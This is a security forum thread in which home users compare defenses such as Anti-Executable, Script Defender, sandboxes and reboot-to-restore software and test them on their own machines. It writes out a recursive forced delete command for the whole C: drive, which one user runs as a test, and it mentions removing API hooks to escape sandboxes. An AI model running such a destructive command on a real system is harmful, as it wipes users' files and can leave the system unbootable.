3) Web-based exploits -1: download a trojan by remote code execution. I don't know what browser you use, but if not IE, most of these exploits might not even run. Nonetheless, Anti-Executable takes care of it. Same with any other attempt to sneak in an executable: auto-run on a CD or USB drive, for example.

4) Web-based exploits -2: recent XSS and the sending out of login data: you've made it clear you don't keep personal information on your HD and that your bank's passwords methods are fool-proof.

Aren't you thoroughly covered? How else could an infected file get on to your computer? Give me an example.

In the very unlikely case that would happen, you have your reboot-to-restore solution.

BTW - just curious why you've added Script Defender? Give me an example of how you think a malicious script file could get on to your computer? How would it run other than being double-clicked? Why would you double-click on an unknown script file?

5) Trustingly installing a program. The last point of entry of an infected file. Here, I think you are covered, because you are the only person besides myself (unless I've missed it) that holds to this philosophy:

I don't see any weaknesses in your setup. Why not just enjoy computing/surfing with what you have and don't be a worry-wart :)
(= tobber?)

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier" }-

I am glad to have such dudes like Eric here on wilders,he forces us to think and re-think about all that matters,i have learned a lot in those endless threats,thank you all !!

-{ Quote: "
BTW - just curious why you've added Script Defender? Give me an example of how you think a malicious script file could get on to your computer? How would it run other than being double-clicked? Why would you double-click on an unknown script file? " }-
I'm not as knowledgeable as you are and many other members at Wilders.
My knowledge about malware and anti-malware is very poor and I don't see the difference between good and bad objects. So I depend on advices from other members.
They told me in this thread, that Anti-Executable doesn't protect you against these file extensions :

.HTA,.JS,.JSE,.REG,.SHB,.SHS,.VBE,.VBS,.WSF,.WSH

And that's why I added Script Defender (= Extension Defender) to protect me against any extension that isn't included in Anti-Executable.

If you can explain to me that I don't really need Script Defender, I'm prepared to ditch it. The less security softwares I have on my computer, the better.

The original purpose of this thread was to find out, if virtualization could be useful for me or NOT as an additional protection to STOP EXECUTIONS of any kind of infection in order to save the period between TWO reboots.
Installation of infections is not a problem, because I boot-to-restore and nothing can beat that, which also means that I have neither problems with detection of infections, nor problems with removal of infections. It's no secret that scanners sometimes DETECT infections, but fail to REMOVE or only do a PARTIAL removal of the infections. I don't have that problem anymore.

My conclusion is that I don't need virtualization softwares, because they only ISOLATE and REMOVE infections, but they don't stop the execution of infections, maybe a few, but not worth to talk about.
If they would have stopped the execution, then I would have called them security softwares, but that's not the case, they RECOVER by REMOVAL and I have this already, not the same way, but the result is the same.
Even PowerShadow recommends to keep your security softwares on their website. Why ? probably because PowerShadow doesn't stop the execution either or not sufficiently enough.

I only hope that other much more knowledgeable members than me, think about the value and risks of virtualization softwares.
They are nice regarding removal, no doubts about that, but maybe not so nice anymore when they still allow execution.
I agree that you can cover the failures of virtualization softwares with other security softwares, like a firewall to stop the sending of private data over the internet executed by a sandboxed infection, but users have to be aware of this.
I was only talking about virtualization software ITSELF without any other security softwares involved.
Once you know the weaknesses of virtualization softwares, you can solve these weaknesses with other security softwares.

I was just trying to get an idea of the benefits of using virtualization softwares, nothing more than that.
If I was a security expert, I wouldn't be here asking questions. I don't know much about Windows, Internet, Malware and Anti-Malware, but I have my analytical, logical brain and that helps me to solve problems even when I don't know much about the subject.

Many thanks for your last post, which gives a good view of the possible infection sources.
My design is still rough and needs to be polished, but those are unimportant details : a better software setting here and there, a better procedure for installing new softwares or keeping changes, ... whatever. It can't get worse only better and better. :)

-{ Quote: "
They are nice regarding removal, no doubts about that, but maybe not so nice anymore when they still allow execution.
" }-
"execution" with very restricted rights. Yes. The worst keyloggers don't work, only browser specific vulnerabilities and such should do something.

-{ Quote: ""execution" with very restricted rights. Yes. The worst keyloggers don't work, only browser specific vulnerabilities and such should do something." }-
If the browser is sandboxed, the sandbox should also protect the browser against its own vulnerabilities. That is my logic of course.

Erik,
An article (http://wiki.castlecops.com/Understanding_Computer_Infections) about how malware can infect computers.
-{ Quote: "If the browser is sandboxed, the sandbox should also protect the browser against its own vulnerabilities. That is my logic of course." }-
Your logic is flawed. f the sandbox checks every bit of code trying to protect the browser against its own vulnerabilities, it becomes a blacklist scanner. Code can execute (almost) freely inside the sandbox.
-{ Quote: "Terrific solution for housewives. ::)" }-
Installing/configuring Anti-Executable isn't housewives-proof either.
Almost all security software should be installed and configured by a user with some knowledge.
AE and Sandboxie are very user-friendly; once they're properly configured, they don't annoy with cryptic pop-ups/prompts.
Firewalls and execution interceptors (classical HIPS) are the less user-friendly apps among security software.

-{ Quote: "If the browser is sandboxed, the sandbox should also protect the browser against its own vulnerabilities. That is my logic of course." }-
Technically i don't know how Tzuk would do it without bloating it. It's not SandboxIE's job to monitor the browser. Its job is preventing anything inside the sandbox from doing harm outside it.

I don't know if AE can prevent that either. Rmus should know the answer though. But i do know that AE could be very uncomfortable to use. I have to turn it off just to do something new.
Note that i like AE's concept too.

-{ Quote: "Many thanks for your last post, which gives a good view of the possible infection sources." }-You are welcome.

-{ Quote: "I have my analytical, logical brain and that helps me to solve problems even when I don't know much about the subject." }-As an analyst, you would agree, I'm sure, that establishing a set of criteria against which to evaluate data, is a good strategy.

I've often used the phrase, security strategy, which I feel should be one's starting point, and selection of products follows as a result of deciding what type of protection takes care of a specific attack point.

Herbalist says essentially the same thing:

http://www.wilderssecurity.com/showpost.php?p=1004849&postcount=18
-{ Quote: "Most users, even many security conscious ones who run multiple AVs, AS, ATs, HIPS, etc, often don't have one thing that is a necessity. That's a well thought out security policy, that basic plan that spells out how different situations are responded to. The security policy is where it should begin, from the apps you choose and how you configure them to your response to an unknown. Default-deny is an example of a very secure policy, but one few users implement." }-

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

-{ Quote: "I don't know if AE can prevent that either. Rmus should know the answer though. But i do know that AE could be very uncomfortable to use. I have to turn it off just to do something new.
Note that i like AE's concept too." }-
I like AE's concept too, because it is based on a whitelist and that makes it an evergreen and without daily updatings.

I have two kinds of whitelists :
1. AE's has a whitelist of all executables on my harddisk
2. The Freeze Storage has a whitelist of all objects on my harddisk, including the executables.

The only difference is that :
1. AE reacts immediately when an unauthorized good or bad executable tries to do its job.
2. The Freeze Storage reacts only on reboot, when it restores my frozen snapshot.
As long I don't reboot a frozen snapshot allows everything, because FDISR is not a security software.

At this moment AE is on HIGH security, which means that it
1. blocks unauthorized 16-bit executables
2. blocks unauthorized 32-bit executables
3. blocks unauthorized drivers and .dll-files
4. Protects AE's folder from access and tampering.

I did not mark "Delete Prevention" and "Copy Prevention", because I don't need them.
If an authorized executable is deleted or copied, the freeze storage will correct this during reboot, because a freeze storage doesn't allow any change, including executables.

Another more important reason is that FDISR doesn't like both settings, while it is copy/updating a snapshot and this results in errors.
During copy/update FDISR :
1. adds objects
2. deletes objects, which is probably in conflict with AE's "Delete Prevention"
3. replaces objects, which is probably in conflict with AE's "Copy Prevention".
I'm still studying this by observation, but it IS a problem.

AE is indeed uncomfortable, but I consider this as temporarily, after awhile everything becomes a habit.
Each security setup is uncomfortable, you only forgot the inconveniences, because you got used to them.

I don't know about the other security softwares, but AE is the first security software, I've ever seen, that protects and hides ITSELF so well. Most security softwares are an open book for everybody : good guys, bad guys and evil objects. :)

-{ Quote: "
Each security setup is uncomfortable, you only forgot the inconveniences, because you got used to them.
" }-
Very true!

-{ Quote: "It's early but whats your impression of ScriptDefender so far. have you tested it against ANY scripts? Safe ones only of course. Reason i ask is if it covers more boundaries then my ScriptSentry you will have contributed to changing my own coverage for those." }-
I can't test security softwares, because I don't know where to get scripts or any other bad object.
I was lucky to find legitimate .js-files on my own harddisk, so I tried to run one of them and ScriptDefender reacted immediately and that's what I expected.

My opinion about ScriptDefender is :
1. It's simple and easy, all the rest is BAD.
2. It's a 'dangerous' security software, because it won't keep me away from running scripts, good or bad.
How can I choose between "Execute" or "Abort", when I don't even see the difference between a good or bad script. They all look the same to me and the bad guys won't give their scripts a suspicious name either. You see the problem ?
3. It's neither a blacklist or whitelist software, it's a warning software for possible bad file extensions, not for script extensions only, like the name "ScriptDefender" says, but for any extension.
4. It has a bad uninstaller for such a little program, because it doesn't remove the intercepts automatically, while the info is available for the uninstaller.

The bottom line is : I don't like ScriptDefender, too dangerous or at least annoying when I say "Abort" to a legitimate script on my computer.

Anti-Executable is a very safe security software and doesn't ask me "Execute" or "Abort", it simply says "NO" without a choice and each "NO" is RIGHT, until it's whitelisted by myself and I don't install softwares permanently, until I know it's a legitimate software.

I do install any kind of software TEMPORARILY and only two things can happen :
1. The software isn't destructive, but nevertheless 'dangerous'. In that case the software will be removed during reboot.
2. The software is destructive, but
a. doesn't corrupt FDISR. In that case the software will be removed during reboot.
b. does corrupt FDISR. In that case an IMAGE will restore my system partition.
In the future I might do testings with softwares like VMware, but once again I can't do it all at once and I work step by step.

I'm only afraid of hardware infections, but I never saw them until now. :)

-{ Quote: "Anti-Executable is a very safe security software and doesn't ask me "Execute" or "Abort", it simply says "NO" without a choice and each "NO" is RIGHT, until it's whitelisted by myself and I don't install softwares permanently, until I know it's a legitimate software." }-

I trust your judgement on the results you are confident in with AE, so thanks for the heads up. Like in an earlier post of mine referring to AE, i tried it once and i know it is quite formidable in that it absolutely refuses executables to launch unless you give it explicit permissions to let them.

I'm almost of the mind to follow you on AE but for the time being i'm quite taken, at least for now, with HIPS that also refuse to allow most ANYTHING to launch without on-the-spot permission to do so, but i see your point. How does the average user determine exactly what is safe to let ride from something which could be a danger to the system settings if allowed to go on.

-{ Quote: "I trust your judgement on the results you are confident in with AE, so thanks for the heads up. Like in an earlier post of mine referring to AE, i tried it once and i know it is quite formidable in that it absolutely refuses executables to launch unless you give it explicit permissions to let them.

I'm almost of the mind to follow you on AE but for the time being i'm quite taken, at least for now, with HIPS that also refuse to allow most ANYTHING to launch without on-the-spot permission to do so, but i see your point. How does the average user determine exactly what is safe to let ride from something which could be a danger to the system settings if allowed to go on." }-
AE is so good and SENSITIVE, that I can't even move my mouse over an unauthorized executable without getting a warning from AE. This happens alot on my data partition when I move my mouse over a downloaded legitimate software-installer, which is still not installed permanently. If I want to move my mouse over it and double-click it, I have to turn off AE.
Other users might consider this as very annoying and uncomfortable, but do they want protection or not ? :)

-{ Quote: "AE is so good and SENSITIVE, that I can't even move my mouse over an unauthorized executable without getting a warning from AE. This happens alot on my data partition when I move my mouse over a downloaded legitimate software-installer, which is still not installed permanently. If I want to move my mouse over it and double-click it, I have to turn off AE.
Other users might consider this as very annoying and uncomfortable, but do they want protection or not ? :)" }-

I've experienced that exact same thing with Anti-Virus apps. Seems like if my mouse pointer got near a listed (so-called) virus file while scrolling down the page, ALERT!!, up would pop the prompt for action to be taken, so if AE does that it's a very good thing.

Revisiting Script Defender:

-{ Quote: "They told me in this thread, that Anti-Executable doesn't protect you against these file extensions :

.HTA,.JS,.JSE,.REG,.SHB,.SHS,.VBE,.VBS,.WSF,.WSH" }-If there were a program to block script file types in the way AE does - that is, to create a white list of script file types and block everything else - many web pages would just refuse to load, for the caching/running of the necessary script files would be blocked, in the way that AE blocks any executable from downloading/running.

-{ Quote: "And that's why I added Script Defender (= Extension Defender) to protect me against any extension that isn't included in Anti-Executable.

If you can explain to me that I don't really need Script Defender, I'm prepared to ditch it. The less security softwares I have on my computer, the better." }-I wouldn't want to say that you need or don't need any program - only you can make that decision - which I see you already have.

But starting over: suppose you were thinking about trialling (oops - trial is not a verb) evaluating it:

In learning what a particular program does, and weighing that against your knowledge of how different types of malware can get onto your computer, you can arrive at a decision.

Remember, of course, that SD and similar programs deal with script files already on the HD that are double-clicked, and do not prevent script files being cached and interpreted by the browser (.js, .css, .vbs, etc). So, we can eliminate that scenario in this case.

Consider a script file, 1.bat on the root of C:\

http://www.urs2.net/rsj/computing/imgs/bat_1.gif

When you d-click a file, this tells Windows to pass that file extension to the program
associated with that file type. For example, d-clicking on a *.doc file,
Windows tells MSWord (or your default Word Processor) to open that file.

If I d-click to open this .bat file, SD alerts, because SD has modified
the Registry entry for 'batfile' so as to "intercept" the Open Command:

http://www.urs2.net/rsj/computing/imgs/bat_reg.gif
_________________________________________________________________________________________

http://www.urs2.net/rsj/computing/imgs/bat_2.gif

One weakness in this type of program is that you can run the file from a Command Prompt
and SD does not intercept because in using the Command Prompt, Windows File Association
does not come into play. Cmd.exe interprets the file directly:

http://www.urs2.net/rsj/computing/imgs/bat_3.gif

Trojans have been known to run scripts using cmd.exe. So, you ask yourself, could a trojan executable get past your defense?

Now that you know what the program protects against, your immediate question should be, under what circumstances would I d-click on a script file?

You would also know that your system currently has no malicious script files on it, so the next question would be, under what circumstances would another script file get on to the HD? And would you d-click it?

Most likely source would be in an email attachment. Would you open it? (We are not considering browser caching here, since SD doesn't deal with that)

With this type of analysis (for any security program), you have information on which to base your decision as to whether or not this program is necessary, or adds anything significant to your set up.


regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

Does AE stop batch (.bat) or executable (.exe and .com - 16-bit/32-bit) files from running when started from the "Command Prompt" (cmd.exe) window?

What does AE do if you run Rich's "1.bat" file?

If you take notepad.exe and copy it to a new name, for example, badguy.exe, and run badguy.exe from the "Command Prompt", does AE allow it to run?

Mike

I ran a rootkit once at a time when at the same time it rendered the command prompt completely useless and thus prevented running ANY command line rootkit detectors. That prompted me afterwards to look for an alternative CMD program to serve as an emergency solution to this and also renamed CMD or something on the order of DMC.exe to overcome that disabling method.

I think one place that AE may fall short is with something like Rundll32.exe. The problem is once it is generically allowed, it can install any DLL. I used to like the way SSM handled it in the pop up, but now they changed it to rule based and it's way to complicated. KAV in the AIC module of the Proactive Defense is now handling it the way I feel comfortable. It asks for permission to run Rundll32.exe and once allowed it then gives the option to select either for everything(like AE) or just for that DLL module. The latter is preferable.

Good for the novice user, probably questionable

Pete

-{ Quote: "I think one place that AE may fall short is with something like Rundll32.exe. The problem is once it is generically allowed, it can install any DLL. " }-I take this to mean that because rundll32.exe is White Listed, a malicious file installed could use it to install any dll.

The malicious file could not install with AE enabled.

Now, if AE is disabled to install a program and it turns out to be malicious, then with AE re-enabled, the malicious file could indeed allow the above scenario to happen.

At this point you need a behavior blocker or such to catch the activity.

AE will not do this because it is not a behavior blocker. So it's not fair to say "it may fall short" since that is not it's job.

If the above scenario with rundll32.exe is of concern, then, of course, you need something else in place to monitor it.

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

-{ Quote: "Does AE stop batch (.bat) or executable (.exe and .com - 16-bit/32-bit) files from running when started from the "Command Prompt" (cmd.exe) window?

What does AE do if you run Rich's "1.bat" file?" }-*.bat is a script file so AE won't catch them. Any file can be run from the Command Prompt inless you've got some way of blocking cmd.exe from running, or a way of intercepting it.

-{ Quote: "If you take notepad.exe and copy it to a new name, for example, badguy.exe, and run badguy.exe from the "Command Prompt", does AE allow it to run?" }-What do you think will happen?

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

-{ Quote: "*.bat is a script file so AE won't catch them. Any file can be run from the Command Prompt inless you've got some way of blocking cmd.exe from running, or a way of intercepting it." }-OK

-{ Quote: "What do you think will happen?" }-I have no actual knowledge/use of AE, so I will guess AE will ask about a child process (badguy.exe) started by parent process (cmd.exe)???

Mike

No, AE's only function is to say "NO" when you attempt to install an executable not already on the White List. Processes and stuff is the job of HIPS and similar programs.

In your example, the "copy" command just creates a copy of the file with a new name, but the original file remains:

http://www.urs2.net/rsj/computing/imgs/notepad_1.gif

However, if you use the "Rename" command, DOS actually deletes the old file and creates a new renamed file, which AE blocks:

http://www.urs2.net/rsj/computing/imgs/notepad_2.gif

Also, AE would block moving the file, because the "Move" command actually involves copying the file to a new location and then deleting the original:

http://www.urs2.net/rsj/computing/imgs/notepad_3.gif

This protection is an added feature to keep someone from inadvertently deleting an executable - in situations where children use the family computer, etc.

In suggesting examples involving processes, the assumption is that some malware has installed and is using cmd.exe to start a child process.

AE would block the installation of the malware, except in the instance I cited above in answer to Pete.

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

I keep AE anyway. I knew in advance that AE wouldn't protect me completely, that is common for all security softwares. What about scanners ? Are they so perfect in protecting your computer ???

I probably need an additional security software that blocks on suspicious behaviour, maybe not. ?

PS: Keep in mind that I also boot-to-restore, which is a killer of any infection. I only need security to save the day, they don't need to be perfect, because they aren't perfect.

-{ Quote: "No, AE's only function is to say "NO" when you attempt to install an executable not already on the White List.
AE would block the installation of the malware" }-What definition does AE think "install" is? When I think of "install", I think of creating folders, add an uninstall entry to the registry, register some dlls, etc.

-{ Quote: "*.bat is a script file so AE won't catch them. Any file can be run from the Command Prompt inless you've got some way of blocking cmd.exe from running, or a way of intercepting it." }-Let me change my mind how I answered that question, instead of my "No" answer.

So, if cmd.exe has been allowed to run, it could do this: DEL /F /S /Q c:\*.* ?

-{ Quote: "run badguy.exe from the "Command Prompt", does AE allow it to run?" }-What was the answer to this?

Mike

-{ Quote: "What definition does AE think "install" is? When I think of "install", I think of creating folders, add an uninstall entry to the registry, register some dlls, etc." }-See here for some examples of "install."

Anti-Executable Tests (http://urs2.net/rsj/computing/tests/AE_install/)

-{ Quote: "
Let me change my mind how I answered that question, instead of my "No" answer.

So, if cmd.exe has been allowed to run, it could do this: DEL /F /S /Q c:\*.* ?

" }-AE would block any executable file from being deleted. I changed your command
to include just *.exe to save me a reboot-to-restore:

http://www.urs2.net/rsj/computing/imgs/AE_delete.gif
________________________________________________________________________

Question: Except that I did it as a test, How could that command get executed on my computer? I'm not sure what your point is.

-{ Quote: "run badguy.exe from the "Command Prompt", does AE allow it to run?" }-Yes, because it is a copy of the orginal file. notepad.exe.

Question: Except that I did it as a test, How could that file have gotten copied on my computer? I'm not sure what your point is.


regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

-{ Quote: "So, if cmd.exe has been allowed to run, it could do this: DEL /F /S /Q c:\*.* ?" }-
In order to test my total recovery solution, I ran this command and it deleted MANY files in my ON-LINE snapshot.
I didn't use a .bat file. I typed everything manual.

After I rebooted my computer, the FDISR Splash Screen appeared, I could boot in my OFF-LINE snapshot, but I couldn't get to the FDISR's main menu. So the FDISR-icon didn't work anymore.

So I tried to boot in my ON-LINE snapshot and I got this error message :
Windows could not start because the following file is missing or corrupt :
<Windows root>\system32\hal.dll.
Please re-install a copy of the above file.

This message indicates that FDISR is corrupted and that means I have to start plan B, because plan A failed.
I consider this as normal, because plan A and B = total recovery solution.

Plan B :
I restored my system partition with an IMAGE and I was back in business.

Conclusion : this was a successfull recovery. :)

-{ Quote: "Although the infections are isolated, my question is still, can these infections still do their evil job or NOT ?
Isolation is nice, but only nice when the execution is also impossible. :)" }-

This was probably already said in this thread (didn't read everything yet), but yes, some malware can do their job even if isolated : Data stealers, for example, will upload your passwords, files, or anything they are designed to steal, to their server, may they be running isolated or not. A trojan like Ldpinch, will send every bit of information it can find, as your XP serial number, etc, before you get rid of it by cleaning the sandbox ;) . Unless the sndbox program do have network control.

-{ Quote: "This was probably already said in this thread (didn't read everything yet), but yes, some malware can do their job even if isolated : Data stealers, for example, will upload your passwords, files, or anything they are designed to steal, to their server, may they be running isolated or not. A trojan like Ldpinch, will send every bit of information it can find, as your XP serial number, etc, before you get rid of it by cleaning the sandbox ;) . Unless the sndbox program do have network control." }-
Thanks nicM, I knew there was something wrong with these isolated infections.
As long the damage is on the harddisk and nothing more than that, then isolation works, but not in your examples.
Do you have a cure for this ? Firewall ? I don't know much about anything.

-{ Quote: "See here for some examples of "install."

Anti-Executable Tests (http://urs2.net/rsj/computing/tests/AE_install/)" }-OK
-{ Quote: "Question: Except that I did it as a test, How could that command get executed on my computer? I'm not sure what your point is." }-My point is, I have not used/seen/tested/studied/researched/etc AE... I have no clue what AE can do or can not do. I was trying to find out if cmd.exe can fork a system up... it appears it can.

-{ Quote: "Yes, because it is a copy of the orginal file. notepad.exe." }-Since AE does this-{ Quote: "Anti-Executable verifies a file in five ways:

* File Size
* File Type (extension)
* File Location
* Creation Date
* Code Sample>" }-Hmmm, does not check the file name or a hash?

-{ Quote: "Question: Except that I did it as a test, How could that file have gotten copied on my computer? I'm not sure what your point is." }-My point is, I have not used/seen/tested/studied/researched/etc AE... I have no clue what AE can do or can not do. :)

I can make up a example of how that command could be ran on your system...
Some Wilders user by the name of "BMF2THEMAX" starts posting/asking questions for say, six months. He/she will appear to be just another confused/ignorant user. After six months and a couple hundred posts, he/she says there is this great new program called CYA-XSS that is wonderful, bla, bla, bla. So, everyone downloads it, and sure enough, it does a few good things. Everyone starts to complain that it does not do xyz. So, an updated CYA-XSS v1.01 is posted. Everyone downloads the updated program. The program waits for 3.14 days, and than creates/spawns a process that runs that DEL command.

I have to clue how a program could do anything on your system if AE is installed... I have not used/seen/tested/studied/researched/etc AE.

I am just another confused/ignorant user asking the same stupid questions over and over and over again.

Mike

-{ Quote: " Data stealers, for example, will upload your passwords, files, or anything they are designed to steal, to their server, may they be running isolated or not. A trojan like Ldpinch, will send every bit of information it can find, as your XP serial number, etc, before you get rid of it by cleaning the sandbox ;) . Unless the sndbox program do have network control." }-
-{ Quote: "Do you have a cure for this ? Firewall ? I don't know much about anything." }-You know much more than you think.

First, ask yourself how this trojan "Ldpinch" would get past your security wall and become installed.

Look again at the ways trojans get installed, and see if you think you have a vulnerability.

Next, look carefully at nicM's statement:

-{ Quote: "...will upload your passwords, files, or anything they are designed to steal" }-You've said in previous posts that your bank password, for example, constantly changes, and that you keep no personal data in files on your computer.

You mention firewall. I assume yours has outbound protection, so that if such a trojan should install, the attempt to connect to the trojans server will be blocked, as here:

Firewall Alert (http://urs2.net/rsj/computing/tests/Kerio-alerts2/)

After thinking through all of this, decide if something more needs to be added to what you already have.

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

-{ Quote: "After I rebooted my computer, the FDISR Splash Screen appeared <snip>" }-This indicates the MBR (Master Boot Record) was not damaged, and the PBR (Partition Boot Record) also was not damaged. FD-ISR (version 3.20 Build 202) does use the PBR for its menu.

-{ Quote: "So I tried to boot in my ON-LINE snapshot and I got this error message :
Windows could not start because the following file is missing or corrupt :
<Windows root>\system32\hal.dll.
Please re-install a copy of the above file.

This message indicates that FDISR is corrupted <snip>" }-Nope, indicates a problem that XP could not find one of the required files to start the boot process.

Here is the XP/W2K boot process...
1) BIOS loads MBR
2) MBR starts %SystemDrive%\ntldr
3) ntldr reads %SystemDrive%\boot.ini and puts up the boot menu
4) selecting a XP/W2K choice from menu causes ntldr to run %SystemDrive%\ntdetect.com to get hardware info
5) ntldr then loads %SystemRoot%system32\ntoskrnl.exe and %SystemRoot%system32\hal.dll (fyi: HAL = Hardware Abstraction Layer)
.
.
.

So, I guess AE did protect %SystemDrive%\ntldr, %SystemDrive%\boot.ini, %SystemDrive%\ntdetect.com, %SystemRoot%system32\ntoskrnl.exe, BUT NOT %SystemRoot%system32\hal.dll.

Mike

-{ Quote: "OK
My point is, I have not used/seen/tested/studied/researched/etc AE... I have no clue what AE can do or can not do...I am just another confused/ignorant user asking the same stupid questions over and over and over again." }-Hello, Mike,

Why not download an evaluation version and run some tests! Old adage in one of my lines of work:

-{ Quote: "Careful photographers run their own tests" }-It's fine to ask for opinions and look at other's tests, but I don't think you will be satisfied until you prove for yourself what you are looking for :)

-{ Quote: " I was trying to find out if cmd.exe can fork a system up... it appears it can." }-Only if you have permitted some bad file to install and become White Listed and then invoke cmd.exe.

-{ Quote: "Since AE does thisHmmm, does not check the file name or a hash?" }-I assume a copy of a file has the same hash.

-{ Quote: "I can make up a example of how that command could be ran on your system...
Some Wilders user by the name of "BMF2THEMAX" starts posting/asking questions for say, six months. He/she will appear to be just another confused/ignorant user. After six months and a couple hundred posts, he/she says there is this great new program called CYA-XSS that is wonderful, bla, bla, bla. So, everyone downloads it, and sure enough, it does a few good things. Everyone starts to complain that it does not do xyz. So, an updated CYA-XSS v1.01 is posted. Everyone downloads the updated program. The program waits for 3.14 days, and than creates/spans a process that runs that DEL command." }-Interesting scenario. I really wonder if it would fly here at Wilders?

First of all, I already demonstrated that AE would prevent that DEL command from deleting executable files. Assuming your scenario where the process runs DEL, as soon as the AE alert popped up, the user would know something wierd is going on.

Second, many here at Wilders run programs that would probably catch this process - they will have to confirm that.

Finally, I would guess that everyone here at Wilders has some restore program that would quickly revert the system back to its original state - as Erik did - since that DEL command would trash non-executable files.

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

-{ Quote: "
So, I guess AE did protect %SystemDrive%\ntldr, %SystemDrive%\boot.ini, %SystemDrive%\ntdetect.com, %SystemRoot%system32\ntoskrnl.exe, BUT NOT %SystemRoot%system32\hal.dll.
" }-
I'm not sure it didn't protect hal.dll.
I could boot in my ON-LINE snapshot the first time, but I ran DEL a second time and this was maybe too much.
I will redo the test tomorrow and see what happens when I run DEL only one time.

I was only interested in my recovery solution, not the consequences of running DEL.

-{ Quote: "So, I guess AE did protect %SystemDrive%\ntldr, %SystemDrive%\boot.ini, %SystemDrive%\ntdetect.com, %SystemRoot%system32\ntoskrnl.exe, BUT NOT %SystemRoot%system32\hal.dll.Mike" }-Without doing a forensic on the HD before it was restored, You can't be sure of the reason, and anything else is conjecture.
I'm sure it wasn't because the file was deleted:

http://www.urs2.net/rsj/computing/imgs/AE_delete-1.gif

EDIT: [remove comments] -- after viewing Erik's last post, I see he omitted an important point in his first post,
so we will have to wait until he runs this test again for clarification.

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

-{ Quote: "Without doing a forensic on the HD before it was restored, You can't be sure of the reason, and anything else is conjecture.
I'm sure it wasn't because the file was deleted:

http://www.urs2.net/rsj/computing/imgs/AE_delete-1.gif" }-

This means that hal.dll was still there, because I could boot in my ON-LINE snapshot the first time, which was seriously damaged by DEL and recovered by FDISR.
But I ran DEL a second time after booting in my ON-LINE snapshot and that was probably too much. I will redo the test to be sure.

There could be another reason : the Delete Prevention of my AE isn't marked.

Virtualization is useless against new threats as many A/V researchers are finding out. A good virus writer can exploit the exception handling in a VM application to detect if their malicious code is running in a VM. The code behaves itself while in the VM and then causes mischief when it's on your "real" PC.

A criminal will behave while under the watchful eye of a parole officer then re-offend when it ends.

~interact

The second test corrupted FDISR also, because of the missing hall.dll.
I also got another message :
Windows cannot find C:\$ISR\$APP\ISRWait.exe
The main reason why it didn't work is that I disabled the "Delete Prevention" (and "Copy Prevention") in my Anti-Executable.
So Anti-Executable is also active in the CMD-window, which is very good.
My on-line snapshot was completely restored, but FDISR itself, didn't work anymore.

I can't enable "Delete Prevention" (and "Copy Prevention"), because it causes errors in the Copy/Update function of FDISR.
I don't need both functions, because my boot-to-restore is supposed to take care of this.

This kind of disaster is included in my recovery solution, so it doesn't matter.
Even a zero-ed harddisk can be recovered this way.

-{ Quote: "Virtualization is useless against new threats as many A/V researchers are finding out. A good virus writer can exploit the exception handling in a VM application to detect if their malicious code is running in a VM. The code behaves itself while in the VM and then causes mischief when it's on your "real" PC.

A criminal will behave while under the watchful eye of a parole officer then re-offend when it ends.

" }-
It's true that some sofisticated malware can detect if it's running on a VM (VMware or the code emulator of an AV engine) and behave in a harmless way until it's executed in a real system.
Go to this page (http://pferrie.tripod.com) made by Peter Ferrie (Symantec researcher) and download a Powerpoint presentation called: "Attacks on Virtual Machines v2 (slides)"
However, the virtualization discussed in this thread aims mainly to sandboxes, which do virtualization in a different way (kernel driver and API hooking) than VMware (full emulation of hardware)
The main worries are:
- Can isolated malware leak outside the sandbox?
- Can isolated malware access confidential files and send private data to a remote server?

When I clicked on Powerpoint presentation (http://pferrie.tripod.com/papers/attacks2.ppt), I got this error:-{ Quote: "This file is hosted by Tripod, a Lycos®Network Site, and is not available for download. Please check out Tripod's Help system for more information about Remote Loading and our Remote Loading policy." }-
I had to go to Peter Ferrie's home page first http://pferrie.tripod.com and then click on the Attacks on Virtual Machines v2 (slides) (http://pferrie.tripod.com/papers/attacks2.ppt) link.

Mike

Lucas1985,

One area that I'm currently investigating is to see if API hooks can be rehooked at the kernel level. Many sandboxes / HIP tools use API hooking to detect process starts. If the hook can be removed then it's goodbye to the sandbox and hello hard disc. It's also worth noting that I'm told a process can be started from kernel mode rather than user mode. I've no idea what impact this would have on a sandbox as it may not see a malware process start.

~interact

-{ Quote: "Lucas1985,

One area that I'm currently investigating is to see if API hooks can be rehooked at the kernel level. Many sandboxes / HIP tools use API hooking to detect process starts. If the hook can be removed then it's goodbye to the sandbox and hello hard disc. It's also worth noting that I'm told a process can be started from kernel mode rather than user mode. I've no idea what impact this would have on a sandbox as it may not see a malware process start.

~interact" }-
How does a process even begin to do those things?
"If the hook can be removed" - How?
I've seen the creator of SandboxIE ask people how. No one answers him. He asks for details, to patch any vulnerabilities. He doesn't doubt there could be vulnerabilities, but he does ask how. He hears crickets.

Pedro,

Here's an interesting article (8.5mb) that got me thinking about doing my own investigations into removing API hooks.

http://www.packetstormsecurity.org/hitb04/hitb04-chew-keong-tan.pdf

I think once this ideology becomes more prevalent in malware then any security tool that uses API hooking could be in trouble.

If you're interested in starting process from kernel mode then I have further info.

~interact

-{ Quote: "When I clicked on Powerpoint presentation (http://pferrie.tripod.com/papers/attacks2.ppt), I got this error:
-{ Quote: "
